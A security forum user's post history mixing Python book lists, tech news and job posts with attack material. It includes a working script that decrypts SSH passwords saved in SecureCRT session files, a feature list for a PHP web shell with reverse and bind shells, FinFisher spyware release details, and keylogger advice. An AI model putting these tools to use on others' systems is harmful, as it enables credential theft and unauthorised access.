Everything posted by Nytro
- 
[h=1]IDA Sploiter[/h]
[TABLE]
[TR][TH]Download[/TH][TD]idasploiter-1.0.zip[/TD][/TR]
[TR][TH]Size[/TH][TD]25.4 KB[/TD][/TR]
[TR][TH]Date[/TH][TD]September 14th, 2014[/TD][/TR]
[TR][TH]Version[/TH][TD]1.0[/TD][/TR]
[/TABLE]

IDA Sploiter is a plugin for Hex-Rays' IDA Pro disassembler designed to enhance IDA's capabilities as an exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.

The motivation for the development of IDA Sploiter was to make IDA Pro a comfortable, powerful and integrated environment for vulnerability research and exploit development. The plugin is designed to make many repetitive and time consuming tasks as effortless and natural as possible, so you can concentrate on other more challenging aspects of exploit development.

To make the work with the plugin convenient, IDA Sploiter closely integrates with the IDA UI and exposes its functionality and various configurations through various views and forms. The plugin's logic uses IDA's powerful disassembly engine and various debugger plugins. As a result, IDA Sploiter can take advantage of many of IDA's unique features (e.g. building ROP chains remotely on a lab machine while effortlessly switching between debugger plugins).

In the user guide below, you will find a comprehensive discussion of various plugin features and their sample use. Most of the sections are independent of each other, so you are welcome to jump ahead or read through the entire guide.

Feel free to contact me if you have any questions, feature requests, bugs or just to say hello.

Table of Contents
[*] Installation
[*] Compatibility
[*] User guide
  [*] Modules
    - Filtering Modules
    - Searching module selection
  [*] ROP gadgets
    - Searching ROP gadgets
    - Viewing ROP gadgets
    - Syntactic and semantic gadget filters
    - ROP chain builder
    - Stack Pivoting
    - Exporting
  [*] Writable function pointers
    - Searching writable function pointers
    - Viewing writable function pointers
    - Pointer offsets
    - Setting breakpoints
    - Exporting
  [*] Memory patterns
    - Creating a pattern
    - Detecting a pattern
  [*] Comparing file to memory
  [*] Special Note
  [*] References

Source: ida sploiter | projects | sprawl
 - 
[h=2]Text Processing in Python[/h]
[h=3]David Mertz[/h]
Intermediate. This is an example-driven, hands on tutorial that carefully teaches programmers how to accomplish numerous text processing tasks using Python.

[h=2]Probabilistic Programming and Bayesian Methods for Hackers: Using Python and PyMC[/h]
[h=3]Cam Davidson-Pilon and community[/h]
Intermediate. aka 'Bayesian Methods for Hackers': An introduction to Bayesian methods + probabilistic programming in data analysis with a computation/understanding-first, mathematics-second point of view. All in pure Python.

[h=2]Explore Flask[/h]
[h=3]Robert Picard[/h]
Intermediate. This book is a collection of the best practices for using Flask. There are a lot of pieces to the average Flask application.

[h=2]Building skills in Python[/h]
[h=3]Steven F. Lot[/h]
Beginner. This 450+ page book has 42 chapters that will help you build Python programming skills through a series of exercises. This book includes six projects from straight-forward to sophisticated that will help solidify your Python skills.

[h=2]web2py Complete Manual[/h]
[h=3]Massimo Di Pierro[/h]
Intermediate. As you will learn in the following pages, web2py tries to lower the barrier of entry to web development by focusing on three main goals: ease of use, rapid development and security.

[h=2]Learning Python, 4th Edition[/h]
[h=3]Mark Lutz[/h]
Beginner. It's an easy-to-follow self-paced tutorial, based on author and Python expert Mark Lutz's popular training course.

[h=2]The Hitchhiker’s Guide to Python![/h]
[h=3]Kenneth Reitz[/h]
Beginner. This opinionated guide exists to provide both novice and expert Python developers a best-practice handbook to the installation, configuration, and usage of Python on a daily basis.

[h=2]Biopython[/h]
[h=3]Various authors[/h]
Intermediate. This is a tutorial and cookbook for Biopython (Biopython is a set of freely available tools for biological computations).

[h=2]Invent Your Own Computer Games with Python[/h]
[h=3]Al Sweigart[/h]
Intermediate. Small and nice Python game examples.

[h=2]Python Practice Book[/h]
[h=3]Anand Chitipothu[/h]
Beginner. This book is prepared from the training notes of Anand Chitipothu. Anand conducts Python training classes on a semi-regular basis in Bangalore, India.

[h=2]Building skills in OOP[/h]
[h=3]Steven F. Lot[/h]
Intermediate. How do you move from OO programming to OO design? This 301-page book has 49 chapters that will help you build OO design skills through the creation of a moderately complex family of application programs.

[h=2]Python Cookbook, Third Edition[/h]
[h=3]Various authors[/h]
Intermediate. This book is aimed at more experienced Python programmers who are looking to deepen their understanding of the language and modern programming idioms.

[h=2]How to Tango with Django[/h]
[h=3]Leif Azzopardi[/h]
Beginner. A beginner's guide to web development with Django 1.5.4. This book has been designed to get you going fast and to learn by example. You'll learn the key aspects of the Python Django Framework by developing an application called Rango.

[h=2]Think Python[/h]
[h=3]Allen B. Downey[/h]
Beginner. A very exhaustive book covering most of the language features, from datatypes to OOP and debugging.

[h=2]Kivy programming Guide[/h]
[h=3]Kivy[/h]
Intermediate. Discover Kivy, the multitouch Python framework for desktop and mobile, and learn how to create a simple game.

[h=2]Python para Desenvolvedores (2nd Edition)[/h]
[h=3]Luiz Eduardo Borges[/h]
Intermediate. [PORTUGUESE] This book covers topics including: building user interfaces, computer graphics, internet applications, distributed systems, among others.

[h=2]Django Tutorial[/h]
[h=3]Community[/h]
Intermediate. With this hands-on tutorial, discover Django, the popular high-level Python Web framework that encourages rapid development and clean, pragmatic design.

[h=2]Python Scientific lecture notes[/h]
[h=3]by the community[/h]
Intermediate. Teaching material on the scientific Python ecosystem, a quick introduction to central tools and techniques. The different chapters each correspond to a 1 to 2 hours course with increasing level of expertise, from beginner to expert.

[h=2]Programmez avec Python 2[/h]
[h=3]Gérard Swinnen[/h]
Beginner. [FRENCH] Learn to program with Python 2. Discover programming and the Python language through this reference work.

[h=2]Making games with Python and Pygame[/h]
[h=3]Al Sweigart[/h]
Intermediate. "Making Games with Python & Pygame" covers the Pygame library with the source code for 11 games.

[h=2]Pyramid for Humans[/h]
[h=3]Community[/h]
Intermediate. With this tutorial, discover Pyramid, a Python web application development framework. Its primary goal is to make it easier for a Python developer to create web applications.

[h=2]Problem Solving with Algorithms and Data Structures Using Python[/h]
[h=3]B. Miller & D. Ranum[/h]
Intermediate. This book is a CS2 data structures textbook, with a review of Python concepts in chapter 1.

[h=2]Flask microframework[/h]
[h=3]Armin Ronacher[/h]
Intermediate. Learn the Flask web microframework by example. Flask aims to keep the core simple but extensible and gives you freedom to choose the libraries of your choice.

[h=2]Learn Python The Hard Way[/h]
[h=3]Zed A. Shaw[/h]
Beginner. Have you always wanted to learn how to code but never thought you could? Do you want to challenge your brain in a new way?

[h=2]Python for you and me[/h]
[h=3]Kushal Das[/h]
Beginner. A book for total newcomers to the Python world. It was started as a book for students before they read the Python tutorial.

[h=2]Programmez avec Python 3[/h]
[h=3]Gérard Swinnen[/h]
Beginner. [FRENCH] Learn to program with Python 3. An update of the previous work covering the specifics of Python 3.

[h=2]How to Think Like a Computer Scientist: Second Interactive Edition[/h]
[h=3]B. Miller & D. Ranum[/h]
Beginner. This interactive book teaches you Python the interactive way, right in the browser.

[h=2]Dive into Python (2004)[/h]
[h=3]Mark Pilgrim[/h]
Intermediate. Dive Into Python is a free Python book (from 2004) for experienced programmers. It covers many basics of the language.

[h=2]Hacking Secret Ciphers with Python[/h]
[h=3]Al Sweigart[/h]
Beginner. The book teaches complete beginners how to program in the Python programming language. The reader not only learns about several classical ciphers, but also how to write programs that encrypt and hack these ciphers.

[h=2]Test-Driven Development with Python[/h]
[h=3]Harry Percival[/h]
Intermediate. This book uses a concrete example—the development of a website, from scratch—to teach the TDD methodology, and how it applies to web programming, from the basics of database integration and JavaScript, going via browser-automation tools like Selenium, to advanced (and trendy) topics like NoSQL, websockets and async programming.

[h=2]Dive into Python 3[/h]
[h=3]Mark Pilgrim[/h]
Intermediate. Dive Into Python 3 covers what's new in Python 3 and how it differs from Python 2.

[h=2]High Performance Python tutorial[/h]
[h=3]Ian Ozsvald[/h]
Advanced. In this 55-page tutorial, Ian Ozsvald shows you a number of techniques to get a 10-500 performance increase in your Python apps, from profiling, to PyPy, NumPy, multiprocessing...

[h=2]Python course[/h]
[h=3]Patrick Fuchs / Pierre Poulain[/h]
Beginner. [FRENCH] Beginner and progressive course about Python theory and concepts.

[h=2]Modeling Creativity[/h]
[h=3]Tom De Smedt[/h]
Intermediate. Case studies in Python - using the libraries nodebox and pattern, the author creates wonderful fractals and infographics; Python code snippets included.

[h=2]A byte of Python[/h]
[h=3]Swaroop C H[/h]
Beginner. This book aims to help you learn the wonderful Python language and show how to get things done quickly and painlessly - in effect 'The Perfect Anti-venom to your programming problems'.

[h=2]Python 101 - Introduction to Python[/h]
[h=3]Dave Kuhlman[/h]
Beginner. This document is a syllabus for a first course in Python programming. This course contains an introduction to the Python language, instruction in the important and commonly used features of the language, and practical exercises in the use of those features.

[h=2]A bit of Python & other things.[/h]
[h=3]Jesse Noller[/h]
Beginner. A useful page with good links to read about Python.

[h=2]Snake Wrangling for Kids[/h]
[h=3]Jason R. Briggs[/h]
Beginner. [DOWNLOAD REQUIRED] For children 8 years and older, who would like to learn computer programming. It covers the very basics of programming, and uses the Python programming language to teach the concepts.

[h=2]Data Structures and Algorithms with Object-Oriented Design Patterns in Python[/h]
[h=3]Bruno R. Preiss[/h]
Intermediate. This book is about the fundamentals of data structures and algorithms. It uses object oriented design patterns and teaches topics like stacks, queues, lists, hashing and graphs. There are also versions for other programming languages.

[h=2]The Standard Python Library[/h]
[h=3]Fredrik Lundh[/h]
Intermediate. This book provides a brief description of each module of the 200+ module Python standard library, with usage examples.

[h=2]Python 3x Programming (sample)[/h]
[h=3]Jody S. Ginther[/h]
Beginner. (4 free chapters) Python 3x Programming, Made Fun and Easier by Jody S. Ginther is for the beginning programmer who wants to learn visually and have some fun while learning programming. The full course will take the beginner from ground zero to making their own arcade style game complete with music, sound, graphics, and how to make a distribution package to share it with your friends, in 21 lessons.

[h=2]Porting to Python 3: An in-depth guide[/h]
[h=3]Lennart Regebro[/h]
Intermediate. This book guides you through the process of porting your Python 2 code to Python 3, from choosing a porting strategy to solving your distribution issues. Using plenty of code examples, it takes you across the hurdles and shows you the new Python features.

[h=2]Programming Computer Vision with Python[/h]
[h=3]Jan Erik Solem[/h]
Advanced. [PDF DRAFT] This book gives an entry point to hands-on computer vision (images, videos...) with enough understanding of the underlying theory and algorithms.

[h=2]Think Complexity[/h]
[h=3]Allen B. Downey[/h]
Advanced. This book is about complexity science, data structures and algorithms, intermediate programming in Python, and the philosophy of science.

[h=2]Natural Language Processing with Python[/h]
[h=3]S. Bird, E. Klein & E. Loper[/h]
Advanced. Practical introduction to programming for language processing, written by the creators of NLTK.

[h=2]Think Stats[/h]
[h=3]Allen B. Downey[/h]
Advanced. Think Stats is an introduction to Probability and Statistics for Python programmers.

[h=2]Getting Started with Django[/h]
[h=3]Kenneth Love[/h]
Beginner. Getting Started with Django (or GSWD) is a series of video-based lessons meant to take you from novice to competent [1], or maybe even beyond.

[h=2]Building skills in Programming[/h]
[h=3]Steven F. Lot[/h]
Beginner. How do you learn to program? Through a series of simple exercises that teach programming fundamentals with an easy-to-use, easy-to-learn programming language.

[h=2]An introduction to Python[/h]
[h=3]John C. Lusth[/h]
Beginner. A complete scholarly overview of all Python 3 functionalities from the University of Alabama.

[h=2]Python Module of the week[/h]
[h=3]Doug Hellman[/h]
Intermediate. The Python Module of the Week series, or PyMOTW, is a tour of the Python standard library through short and concrete examples. It covers more than 50 modules.

[h=2]Djen of Django[/h]
[h=3]Agiliq[/h]
Intermediate. Djen of Django is a book consisting of a series of small Django projects based on small real-world examples. For instance, building a Pastebin, a Blog or a Project Management Application. Djen of Django focuses on teaching the reader Django best practices through the use of real-world examples.

[h=2]Python Course[/h]
[h=3]Google[/h]
Beginner. This is a free class for people with a little bit of programming experience who want to learn Python.

[h=2]A Programmer's Guide to Data Mining[/h]
[h=3]Ron Zacharski[/h]
Intermediate. A guide to practical data mining, collective intelligence, and building recommendation systems.

[h=2]Python in Hydrology[/h]
[h=3]Sat Kumar Tomer[/h]
Beginner. Python in Hydrology is written for learning Python using its applications in hydrology. The book covers the basic applications of hydrology, and also advanced topics like the use of copulas.

[h=2]Non-Programmer's Tutorial for Python 3[/h]
[h=3]Josh Cogliati/Wikibooks/Others[/h]
Beginner. The Non-Programmers' Tutorial For Python 3 is a tutorial designed to be an introduction to the Python programming language. This guide is for someone with no programming experience.

[h=2]Python para todos[/h]
[h=3]Raúl González Duque[/h]
Beginner. [SPANISH] A book on Python programming written as a tutorial, suitable for all learning levels, from beginners to experts who want to know more about Python.

Source: PythonBooks - Learn Python the easy way !
 - 
SpyFiles 4

Today, 15 September 2014, WikiLeaks releases previously unseen copies of weaponised German surveillance malware used by intelligence agencies around the world to spy on journalists, political dissidents and others.

FinFisher (formerly part of the UK based Gamma Group International until late 2013) is a German company that produces and sells computer intrusion systems, software exploits and remote monitoring systems that are capable of intercepting communications and data from OS X, Windows and Linux computers as well as Android, iOS, BlackBerry, Symbian and Windows Mobile devices. FinFisher first came to public attention in December 2011 when WikiLeaks published documents detailing their products and business in the first SpyFiles release. Since the first SpyFiles release, researchers published reports that identified the presence of FinFisher products in countries around the world and documented its use against journalists, activists and political dissidents.

Julian Assange, WikiLeaks Editor in Chief said: "FinFisher continues to operate brazenly from Germany selling weaponised surveillance malware to some of the most abusive regimes in the world. The Merkel government pretends to be concerned about privacy, but its actions speak otherwise. Why does the Merkel government continue to protect FinFisher? This full data release will help the technical community build tools to protect people from FinFisher including by tracking down its command and control centers."

FinFisher Relay and FinSpy Proxy are the components of the FinFisher suite responsible for collecting the data acquired from the infected victims and delivering it to their controllers. It is commonly deployed by FinFisher's customers in strategic points around the world to route the collected data through an anonymizing chain, in order to disguise the identity of its operators and the real location of the final storage, which is instead operated by the FinSpy Master.

[TABLE=class: table table-bordered]
[TR][TH]File Name[/TH][TH]Product Name[/TH][TH]MD5[/TH][TH]File Size[/TH][/TR]
[TR][TD]ffrelay-debian-4.30.ggi.zip[/TD][TD]FinFisher Relay v4.30[/TD][TD]180caf23dd71383921e368128fb6db52[/TD][TD]224K[/TD][/TR]
[TR][TD]finspy_proxy.zip[/TD][TD]FinSpy Proxy v2.10[/TD][TD]3dfdac1304eeaaaff57cc11317768511[/TD][TD]320K[/TD][/TR]
[TR][TD]finspy_master.zip[/TD][TD]FinSpy Master v2.10[/TD][TD]03d93c49a536d149206f5524d87fa319[/TD][TD]2.5M[/TD][/TR]
[/TABLE]

WikiLeaks is also publishing previously unreleased copies of the FinFisher FinSpy PC spyware for Windows. This software is designed to be covertly installed on a Windows computer and silently intercept files and communications, such as Skype calls, emails, video and audio through the webcam and microphone (you can find more details on FinSpy in the first SpyFiles release). In order to prevent any accidental execution and infection, the following files have been renamed and compressed in password protected archives (the password is "infected"). They are weaponised malware, so handle carefully.

[TABLE=class: table table-bordered]
[TR][TH]File Name[/TH][TH]Product Name[/TH][TH]MD5[/TH][TH]File Size[/TH][/TR]
[TR][TD]finfisher.1.zip[/TD][TD]FinSpy PC[/TD][TD]2d5c810035dc0f83036fb12e8775817a[/TD][TD]736K[/TD][/TR]
[TR][TD]finfisher.2.zip[/TD][TD]FinSpy PC[/TD][TD]434b83eba7619cb706492ff019ade0d5[/TD][TD]576K[/TD][/TR]
[/TABLE]

In order to challenge the secrecy and the lack of accountability of the surveillance industry, analyzing the internals of this software could allow security and privacy researchers to develop new fingerprints and detection techniques, identify more countries currently using the FinFisher spyware and uncover human rights abuses.

In addition, in this fourth iteration of the SpyFiles collection, WikiLeaks publishes the newly indexed material the same as the recent FinFisher breach (for which you can find the torrent file here), including new brochures and a database of the customer support website, that provide updated details on their product line and a unique insight into the company's customer base. In order to make the data more easily accessible and consumable, all the new brochures, videos and manuals are now available organized under the related FinFisher product name. The database is represented in full, from which WikiLeaks compiled a list of customers, their eventual attribution, all the associated support tickets and acquired licenses, along with the estimated costs calculated from FinFisher's price list. WikiLeaks conservatively estimates FinFisher's revenue from these sales to amount to around €50,000,000. Within the full list of customers, it's worth noticing that among the largest is Mongolia, which has been recently selected as new Chair of the Freedom Online Coalition.

Together with the previous releases, the SpyFiles collection represents a unique and central resource where to find extensive and exclusive documentation about the global surveillance industry, also indexed and searchable through the WikiLeaks Search.

Source: https://wikileaks.org/spyfiles4/index.html
 - 
ANAF has launched the online platform through which individuals can find out information about their tax situation. How the "Spațiul virtual privat" (Private Virtual Space) works

On Monday ANAF launched an online platform on its own website through which individuals can request, after registering and authenticating with a username and password, information such as the status of their payment obligations, the social security contribution (CAS) level declared by their employer and their tax assessment decision, with the answer also delivered electronically. The platform, called "Spațiul virtual privat", is for now dedicated to individuals, as part of a pilot project for Bucharest and Ilfov, and the data can be consulted 24 hours a day.

"In 2015 we intend to extend the project to the whole country, and after we extend it, other information will be added to the Private Virtual Space, such as tax assessment decisions for advance payments and for other accessory charges, summonses and enforcement titles. Also in 2015 we want to extend the programme to legal entities, which will be able to log in with a username and password," Minister of Public Finance Maria Ioana Petrescu said on Monday at the launch of the platform, which was also attended by Prime Minister Victor Ponta.

She pointed out that, at present, companies can check their tax situation only if they hold a digital signature certificate, which is obtained for a fee. The budget for this pilot programme was zero, according to the minister, with a joint ANAF and MFP team working on it, but extending it nationwide requires a server infrastructure. "We are in discussions with the World Bank so that the servers it has to send for the modernisation of ANAF arrive in time for this programme," Petrescu said.

Individuals can submit their requests online, after authenticating in the system, and the answers are received within the application, in a messages section, with the requested documents attached. The payment obligations sent by ANAF are valid for the last day of the month preceding the query, and tax assessment decisions can be received if they were issued after the date the system went into operation. For employees who have income only from individual employment contracts no tax assessment decisions are issued, so for registration in the virtual space their identification must be done directly at the ANAF counter.

At the same time, ANAF will make the "Buletinul informativ fiscal" (Tax Information Bulletin) service available to taxpayers, including during the pilot project period, which will include public tax-related information such as the calendar of tax obligations, legislative news, tax guides, campaigns carried out and press releases.

Source: ANAF has launched the online platform through which individuals can find out information about their tax situation. How the "Spațiul virtual privat" works - Mediafax
 - 
How to start blogging with Microsoft Word
Alex Castle, Sep 15, 2014 3:30 AM

Blogging with Microsoft Word lets you use the richly featured word processor to circumvent many of the underpowered, sometimes unfriendly aspects of browser-based interfaces used by platforms like WordPress or Blogger. We'll show you several ways to write and publish blog posts directly from Word, using the tools and shortcuts you already know. While this tutorial is written for Word 2013, the necessary features are available in all versions starting from Word 2007.

[h=2]WordPress[/h]
WordPress is a super-popular, open-source blogging platform that’s designed to be flexible, customizable and user-friendly. WordPress is also very easy to use with Microsoft Word. If you haven’t already set up a WordPress blog, you can do it in just a few minutes. Just visit WordPress.com, pick a URL that’s not taken yet, and fill in some basic personal info. WordPress will try to upsell you to the $25-per-year hosting, but if you decline you’ll still have unlimited free hosting and a “[something].wordpress.com” domain name. You’ll be asked to pick a theme for your site, connect a social media account, and write an introductory post. You can skip the latter two steps and go back to change any of this stuff at a later time.

Creating a WordPress blog is easy and intuitive on WordPress.com.

Setting up a WordPress blog on your own web server isn't much harder, but takes a little more time. You can also download and install WordPress on almost any web host. Many hosts have scripts that handle the setup for you, but you can always visit WordPress.org to download a copy of the software. (Note that the .org website is dedicated to the WordPress software itself, while the .com website is the hosted service.)

After a quick confirmation of your email address, you’re ready to begin writing your first blog post. Open up Word and click File > New. From the templates menu, choose Blog Post and click Create.

Crafting blog posts in Word provides a familiar interface and set of tools. Not all of Word's functionality is available, though.

Click the button at the top left of the window marked Manage Accounts. In the dialog that pops up, you can add any number of accounts and choose which one to publish to. Click New Account and choose WordPress from the dropdown menu. You’ll be asked for your blog’s URL (enter it without the “www.”), account name, and password. Once you’ve done that, just use the formatting tools in Word to write as you normally would. When you’re done, click the Publish button in the top left. Your post will be uploaded to your WordPress blog.

When viewed in a browser, WordPress posts crafted in Word will look as you expect them to. Spacing and colors are subject to the theme you choose for your blog, however.

If you’d like to upload it but not make it public yet, click on the arrow under Publish and choose Publish as Draft. You’ll be able to find the post in your WordPress posts list, and you can publish it whenever you want.

[h=2]Blogger[/h]
Another popular blogging platform is Google’s Blogger. Google account integration is obviously one of its advantages over WordPress, but Microsoft Word’s integration with the service isn’t quite as polished. Word can’t upload images directly to Blogger, for instance—you’ll have to go into the Blogger CMS (content management system) and add them manually.

To get started, go to Blogger and log in with a Google account. The default setting is to link your Blogger blog to your Google+ account, but you could also choose to log in with a limited Blogger account. You’ll still log in with your Google account, but you can pick a new user name for the Blogger profile, and the two won’t be publicly linked.

Creating a new Blogger blog is very simple, especially for the Google faithful.

Next, you’ll see the Blogger dashboard, which shows you a (still empty) list of blogs you own. Click the “New Blog” button. Like WordPress, you choose a domain name as well as a theme for your site. Click “Create Blog,” and you’re ready to post.

Back in Word, you can post to Blogger the same way as in the WordPress section above—just click File > New > Blog post and add your Blogger account information in the account manager. Because you can’t automatically upload images to Blogger using this method, your posts will have to be text-only. Still, you can use Word’s text-formatting options, such as headers, bold and italics and text alignment, and that will carry over to your blog post intact.

[h=2]Using other platforms[/h]
Although WordPress and Blogger are better suited to fledgling bloggers, a few other blog platforms work with Microsoft Word’s publishing capability, including TypePad, and Microsoft’s own SharePoint.

Here’s the trick you can use with alternative blogging platforms. Normally, if you copy and paste text from Word into a browser-based editor, the post will be utterly, irrevocably messed up by Word's usually-invisible formatting data, which turns into gibberish when you copy it into a different editor. Copying the Word text into a plaintext editor like Notepad strips out all the formatting data. Next, copy the text from Notepad into the target editor (like a web form). This will keep your post from breaking, but it strips out all the formatting, which kind of defeats the purpose of using Word in the first place.

Converting your Word document to Google Docs format will strip out the parts of the Word document that don't translate well to a copy-and-paste.

You can strip out the junk data without removing the formatting by using Google Drive. Just save your draft as a .doc or .docx file, then upload that to your Google Drive. Open the file using Google’s web-based word processor, Docs. The processor will automatically convert the Word file into blog-friendly HTML, and you can copy-paste the whole post from the Google editor to your blog platform of choice, keeping all your formatting. This trick won’t work for all browser editors, and you might have to make a few corrective tweaks. Still, it’s a lot easier than reformatting a long post from scratch.

Source: How to start blogging using Microsoft Word with WordPress or Blogger
 - 
CCCP Shell

CCCPShell is a PHP Shell written from scratch in my spare time. You will find in this shell:
[*] Pure javascript (sessionStorage, serialize, ajax, append, remove, empty, change sort table order and dialogs modals)
[*] PHP zip with php code
[*] Full DB explorer (mysql, mssql, pgsql, oracle, sqlite, sqlite3, odbc and pdo)
[*] 21 icons for use in 94 file types
[*] CSS3
[*] Easy to translate to another language via tText function
[*] WIP
[*] All the standard shell stuff
[*] Encrypted communication (first phpshell in the world???)

All tools

Filemanager
[+] Copy/paste (recursive)
[+] In memory compress and download (recursive)
[+] Delete (recursive)
[+] Create file/folder
[+] Fast view folder size/count objects
[+] Fast file rename
[+] Fast chmod
[+] Fast change filedate
[+] Create file/folder
[!] View file information
  [+] Full Path
  [+] Size
  [+] MD5
  [+] Chmod/Chown
  [+] Create time
  [+] Access time
  [+] Modify time
  [+] Hexdump preview/full
  [+] Highlight code
  [+] File Content
[!] Edit
  [+] Change filetime
  [+] File Name
  [+] Change content

Procs
[+] Process viewer/info
[+] Process killer

SQL
[+] Database explorer
[+] Execute SQL code

Info
[+] Server info
[+] PHP Info
[+] Custom functions check

External Connect
[+] Back Connect
[+] Bind Shell

Execute
[+] Eval PHP code
[+] Execute (exec, shell_exec, system, passthru, popen and proc_open)

Self remove

WARNING: This shell uses the atob and btoa javascript functions. Read whether your browser supports them: https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64.atob

Source: https://github.com/xchwarze/CCCPShell
Via: TrojanForge
 - 
For a new project involving desktop application development on MAC and Windows, our client is looking for a C++ Programmer with experience in the Qt framework, who will be part of a 5-person team. The position is open both in Bucharest and at the Iasi office. Anyone interested, send me a PM.
 - 
I'm sending you more information about the Embedded Software Developer opportunity for the Bucharest location, for one of our projects operating in the automotive field. PM me if you're interested.
 - 
Isn't this the guy who said he makes 140 million a month? Is he by any chance in Amsterdam and got up to some shady stuff?
 - 
Give us more details. What exactly do you do there? What languages do you know? Which language do you work in the most? Who gave you 40 million initially? Who gives you 140 million? Is this in Romania? How old are you? How many years of experience do you have? Do you have connections in the public sector? Is that what you get in hand, i.e. net salary?
 - 
Super cool! I made $10 in just 2 weeks! BRB, buying myself TWO packs of cigarettes!
 - 
Dude. Who the hell do you think is going to throw money at you? Screw that! You have never written 200 lines of code in your life and you expect a salary of 50 million. Idiots. At the start nobody will give you more than 1500-2000, regardless of the language. Especially since you show up with a CV that says "Oh, I know 42 programming languages" and nothing else. Projects you've worked on? Zilch.

They are all profitable. In any language you can earn up to 2000-2500 euros a month. But that is once you become Team Leader, Manager or hold some other management position. In the meantime, you start at 1500 RON (which you don't even deserve) and grow gradually. Let's put it this way: 1500 RON for about 6 months to 1 year. Then you get to 20-something million, then 30 million. And only after at least 2 years of experience should you have the decency to ask for more than that. You can grow faster too, depending on the company you end up at and how good you are.

Stop listening to others who say they make 80 million a month. People do earn that, but after many years of work. That guy maybe worked 5 years to reach that salary, while you spent 5 years jerking off, did nothing, and now go to interviews wondering why they show you the door when the salary comes up.

As for the programming language, the choice is simple: pick what you like. You will always be good at what you enjoy doing. Just like you are good at playing crappy games, you will be good at C++ if that is what you like.

But before even thinking about getting a job, write your CV and imagine you own a company and a kid walks in with that CV and you discuss salary. That is how you will figure out what you are worth.

Note: If you are an olympiad winner or good at something, you can earn more from the start. Let's say you get 40 million a month from the start. But that comes bundled with other drawbacks: 1. You will NOT see a raise 2. You are NOT allowed to leave that company for 2 years. It is just one case, more or less real.

If a company offers you a big salary, be sure something is off and read the contract before signing it. @2time - What was your first salary? @gogusan - Did they give you that as a first salary for Java? This is about the first salary. Stop coming here with numbers like that, giving kids illusions.

Note: A relative of mine earns 1500 RON a month as a cleaning lady. Programming is not what it was a few years ago. There are THOUSANDS of people, man, THOUSANDS of people graduating from a relevant faculty (if you didn't go to the University or the Polytechnic in Bucharest, nobody looks at your Spiru Haret CV). Admittedly, most of them are losers who learn nothing and just expect billions because they finished some crappy faculty. But for the employer what matters is that one of these losers comes in asking for 3 million a month less.

So: 1. Work on projects. Drop the jerking off, the TV shows and the games. Work! Build yourself a CV, so you have something to show the guy when you tell him you want a pile of money from him. 2. Go to a good faculty. Not bloody Spiru Haret or whatever. It matters more than you think. 3. Learn! At school or at home, learn, because interviews have technical questions, interviews that last even 3-4 hours. Stop listening to all the fools posting here, who are 15 and live on their parents' money.
 - 
Decrypt SSHv2 passwords stored in VanDyke SecureCRT

#!/usr/bin/env python
#
# Decrypt SSHv2 passwords stored in VanDyke SecureCRT session files
# Can be found on Windows in:
# %APPDATA%\VanDyke\Config\Sessions\sessionname.ini
# Tested with version 7.2.6 (build 606) for Windows
# Eloi Vanderbeken - Synacktiv
#
# Python 2 script; needs PyCrypto (Crypto.Cipher.Blowfish)

from Crypto.Cipher import Blowfish
import argparse
import re


def decrypt(password):
    # Two fixed Blowfish-CBC keys with an all-zero IV. The stored value is hex:
    # it is decrypted with c2, 4 bytes are stripped from each end, then decrypted with c1.
    c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ', '').decode('hex'),
                      Blowfish.MODE_CBC, '\x00' * 8)
    c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ', '').decode('hex'),
                      Blowfish.MODE_CBC, '\x00' * 8)
    padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
    # The plaintext is UTF-16 terminated by a 16-bit NUL
    p = ''
    while padded[:2] != '\x00\x00':
        p += padded[:2]
        padded = padded[2:]
    return p.decode('UTF-16')


REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)')
REGEX_PASSWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)')
REGEX_PORT = re.compile(ur'D:"\[SSH2\] Port"=([0-9a-f]{8})')
REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)')


def hostname(x):
    m = REGEX_HOSTNAME.search(x)
    if m:
        return m.group(1)
    return '???'


def password(x):
    m = REGEX_PASSWORD.search(x)
    if m:
        return decrypt(m.group(1))
    return '???'


def port(x):
    m = REGEX_PORT.search(x)
    if m:
        # Port is stored as 8 hex digits
        return '-p %d ' % (int(m.group(1), 16))
    return ''


def username(x):
    m = REGEX_USERNAME.search(x)
    if m:
        return m.group(1) + '@'
    return ''


parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files')
parser.add_argument('files', type=argparse.FileType('r'), nargs='+', help='session file(s)')
args = parser.parse_args()

for f in args.files:
    # Session files are UTF-16; dropping the NUL bytes leaves plain ASCII for the regexes
    c = f.read().replace('\x00', '')
    print f.name
    print "ssh %s%s%s # %s" % (port(c), username(c), hostname(c), password(c))
 - 
	
	
Ardamax Keylogger 4.2 Professional Edition DC 02.09.2014
Nytro replied to old66's topic in Programe hacking
Use it from a virtual machine. And it IS a keylogger. - 
	Zeroing buffers is insufficient On Thursday I wrote about the problem of zeroing buffers in an attempt to ensure that sensitive data (e.g., cryptographic keys) which is no longer wanted will not be left behind. I thought I had found a method which was guaranteed to work even with the most vexatiously optimizing C99 compiler, but it turns out that even that method wasn't guaranteed to work. That said, with a combination of tricks, it is certainly possible to make most optimizing compilers zero buffers, simply because they're not smart enough to figure out that they're not required to do so — and some day, when C11 compilers become widespread, the memset_s function will make this easy. There's just one catch: We've been solving the wrong problem. With a bit of care and a cooperative compiler, we can zero a buffer — but that's not what we need. What we need to do is zero every location where sensitive data might be stored. Remember, the whole reason we had sensitive information in memory in the first place was so that we could use it; and that usage almost certainly resulted in sensitive data being copied onto the stack and into registers. Now, some parts of the stack are easy to zero (assuming a cooperative compiler): The parts which contain objects which we have declared explicitly. Sensitive data may be stored in other places on the stack, however: Compilers are free to make copies of data, rearranging it for faster access. One of the worst culprits in this regard is GCC: Because its register allocator does not apply any backpressure to the common subexpression elimination routines, GCC can decide to load values from memory into "registers", only to end up spilling those values onto the stack when it discovers that it does not have enough physical registers (this is one of the reasons why gcc -O3 sometimes produces slower code than gcc -O2). 
